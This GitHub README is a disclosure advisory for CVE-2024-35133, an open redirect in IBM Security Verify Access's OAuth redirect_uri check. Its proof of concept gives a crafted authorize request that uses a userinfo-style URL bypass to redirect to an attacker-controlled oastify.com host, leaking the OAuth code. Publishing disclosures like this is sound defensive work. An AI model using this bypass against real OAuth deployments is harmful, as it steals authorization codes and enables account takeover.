Skip to content

Ozozuz/Ozozuz-IBM-Security-Verify-CVE-2024-35133

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
 
 
 
 

Repository files navigation

IBM Security Verify Access - Open Redirect during OAuth Flow (CVE-2024-35133)

Table of Contents

  1. Overview
  2. Detailed Description
  3. Proof of Concept
  4. Solution
  5. Disclosure Timeline
  6. References
  7. Credits
  8. Legal Notices

Overview

Revision: 1.0
Impact:
By persuading a victim to visit a specially crafted website, a remote attacker could exploit this vulnerability to spoof the URL displayed and redirect the user to a malicious website. This could allow the attacker to obtain highly sensitive information or conduct further attacks against the victim.

Severity:

  • NIST: High
  • IBM: Medium

CVSS Score:

  • NIST: 8.2 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N)
  • IBM: 6.8 (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:H/A:N)

CVE-ID: CVE-2024-35133

Vendor: IBM

Affected Products:

  • IBM Security Verify Access
  • IBM Security Verify Access Docker

Affected Versions: 10.0.0 - 10.0.8

Product Description

IBM Security Verify Access is a complete authorization and network security policy management solution. It provides end-to-end protection of resources over geographically dispersed intranets and extranets.

Some key features include:

  • Authentication: Wide range of built-in authenticators and support for external authenticators.
  • Authorization: Secure permit and deny decisions for protected resource requests.
  • Data Security and Centralized Resource Management: Manages secure access to internal network-based resources using public Internet connectivity through a corporate firewall system.

Detailed Description

During a penetration test of the OAuth flow for a client, an Open Redirect vulnerability was discovered, allowing the leakage of the OAuth "code" variable.

By bypassing the parser's logic responsible for verifying the "redirect_uri" parameter during an OAuth flow (leveraging RFC 3986), the attacker could manipulate the domain whitelist filter in IBM Security Verify Access. This resulted in an open redirect to any arbitrary domain controlled by the attacker. The victim could be redirected to a malicious site while the domain appears trusted.

This could lead to the exposure of sensitive information like the OAuth "code" token or further attacks against the victim.


Proof of Concept

Request

GET /oauth/oauth20/authorize?response_type=code&client_id=[REDACTED]&state=001710863806728MPUw0xFSj&REDACTED_uri=https://legitimate.domain:bypass@0lmd9sa7p0cez16vdcldhcgygpmga6yv.oastify.com/[REDACTED]/openid/REDACTED/[REDACTED]&scope=openid+ HTTP/1.1
Host: [REDACTED]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

Response

HTTP/1.1 302 Found 
content-language: en-US 
date: Tue, 19 Mar 2024 16:04:35 GMT 
location: https://legitimate.domain:bypass@0lmd9sa7p0cez16vdcldhcgygpmga6yv.oastify.com/[REDACTED]/openid/REDACTED/[REDACTED]?state=001710863806728MPUw0xFSj&code=7wkH581y0uyS0nm4ff65zCqHn0WC46w7v&iss=[REDACTED] 
p3p: CP="NON CUR OTPi OUR NOR UNI" 
x-frame-options: DENY 
x-content-type-options: nosniff 
cache-control: no-store 
x-xss-protection: 1; mode=block 
x-permitted-cross-domain-policies: none 
cross-origin-resource-policy: same-site 
content-security-policy: frame-ancestors 'none' 
referrer-policy: no-referrer-when-downgrade 
strict-transport-security: max-age=31536000; includeSubDomains 
pragma: no-cache 
Content-Length: 0.

Solution

Refer to IBM Security Bulletin 7166712 for patch, upgrade, or suggested workaround information.
See References for more details.


Disclosure Timeline

  • 19/03/2024: Vulnerability discovered by the Security Researcher (Giulio Garzia)
  • 21/03/2024: Vulnerability shared with the client relying on IBM Security Verify Access
  • 02/04/2024: Vulnerability reported to IBM
  • 14/05/2024: Vulnerability confirmed by IBM
  • 18/07/2024: Pre-release patch provided by IBM to the customer
  • 27/08/2024: Security Bulletin and vulnerability shared by IBM

References

  1. IBM Security Bulletin CVE-2024-35133
  2. IBM X-Force Vulnerability Database
  3. NIST CVE-2024-35133
  4. CWE-178: Improper Handling of URL

Credits

This vulnerability was discovered and reported by:


Legal Notices

Copyright (c) 2024 Giulio Garzia "Ozozuz"

Permission is granted for electronic redistribution of this alert. It may not be edited without explicit written consent. For permission to reprint this alert in other media, contact the author.

Disclaimer: The information in this advisory is accurate at the time of publishing based on available data. No warranties are provided. Neither the author nor publisher accepts liability for direct, indirect, or consequential damage arising from use of this information.

About

Security Bulletin for CVE-2024-35133 - With PoC

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published